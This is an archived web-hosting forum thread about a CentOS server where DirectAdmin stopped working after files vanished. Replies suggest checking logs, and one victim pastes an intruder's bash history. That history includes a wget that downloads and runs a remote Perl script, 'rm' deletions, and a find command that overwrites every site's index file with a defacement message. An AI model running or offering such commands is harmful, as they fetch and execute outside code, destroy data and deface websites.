PDA

View Full Version : DirectAdmin not working on CentOS 5.5



NH-hosting
12-28-2010, 02:41 PM
hello,

I've been having some trouble with DirectAdmin.
shortly ago I have some seriouce trouble with the server, somehow several files, including binaries, where deleted.
I never found why but since that DirectAdmin no longer works.

Apache is running and it seems to work, yet I also can't load any html on port 80.
I'm trying to connect through the IP address, so I'm sure it's not a DNS error, FTP also works.

I have no idea what exactly is wrong, httpd.conf does not contain any erros, or none I've found.
I'm using CentOS 5.5 with the latest version of DirectAdmin, I hope someone else knows what may be wrong.

Richard G
12-28-2010, 04:55 PM
Binaries got deleted???
If that's the case you best install your server new.

However you should check your logs to see what caused it. Could be hackers, could also be malfunctioning hardware like harddisk.

The following files might tell you more:
/var/log/messages
/var/log/secure
/var/log/xferlog
/var/log/httpd/error_log
/var/log/httpd/homedir.log
and /var/log/httpd/access.log

If it was a hacker and they had root access, check:
/root/.bash_history
you might be lucky and get a history of what's done.

But if binarie and other files are really deleted, it mostly is no hardware error but root error or hackers.

AndyII
01-19-2011, 12:58 PM
I know I need to reformat and start over ...and I am
soon as I get all sites repaired and backed up
(private server so I dont have too many)
but I went and looked at bash history
some pointers on how to plug this hole?
I am hoping that the new OS and Apache, PHP , ect will stop most of this


id
locate "httpd.conf"
whereis httpd.conf
pwd
ls
rm *
cat /usr/local/apache/conf/httpd.conf
cat /usr/local/directadmin/data/users/*/httpd.conf |grep ServerName
cat /usr/local/directadmin/data/users/*/httpd.conf | grep ServerName | uniq
pwd
cat /usr/local/directadmin/data/users/*/httpd.conf |grep DocumentRoot
echo "haCked By T0r3x :]" > /tmp/index.html
cat /tmp/index.html
find /home -name "index.*" -exec cp /tmp/index.html {} \;
id
pwd
ls
cd ..
find own
rm -rf own
find own
wget woodcoinc.us/x/log.txt;mv log.txt log.pl; find log.txt log.pl
pwd
find own log.txt log.pl
perl log.pl
service syslogd restart
syslogd start
chkconfig --list syslog
/etc/init.d/syslog start
top
reboot

nobaloney
01-21-2011, 10:45 AM
@AndyII:

Did you post in the wrong thread? I've already responded in the other thread.

Jeff

AndyII
02-02-2011, 04:03 PM
was commenting on Richards post about the bash history and what I had found in mine, because they gained access here means I need to plug that hole, and how much of it would be covered with all the new OS and other services......
thanks to Richard for the tip :)
plus I too am running CentOS